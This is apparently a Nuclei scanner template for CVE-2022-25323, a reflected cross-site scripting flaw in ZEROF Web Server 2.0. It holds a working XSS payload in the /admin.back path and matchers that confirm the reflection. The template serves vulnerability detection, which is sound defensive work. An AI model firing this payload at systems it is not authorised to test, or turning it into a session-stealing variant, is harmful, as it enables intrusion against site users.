52 lines
1.7 KiB
YAML
52 lines
1.7 KiB
YAML
id: CVE-2022-25323
|
|
|
|
info:
|
|
name: ZEROF Web Server 2.0 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0.
|
|
reference:
|
|
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
|
|
- https://awillix.ru
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
- https://github.com/awillix/research
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-25323
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00115
|
|
epss-percentile: 0.45093
|
|
cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: zerof
|
|
product: web_server
|
|
tags: cve,cve2022,xss,zerof
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'back<img src=x onerror=alert(document.domain)>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 401
|
|
# digest: 4a0a00473045022100e86147269d500eee87a76dc8b3d4d6b539f23c5c25293ad044322e223159453702203e3e862ec74768390d0b5445cfb478c43678e1e7109cd2e1d3f97e9bb17fdd90:922c64590222798bb761d5b6d8e72950 |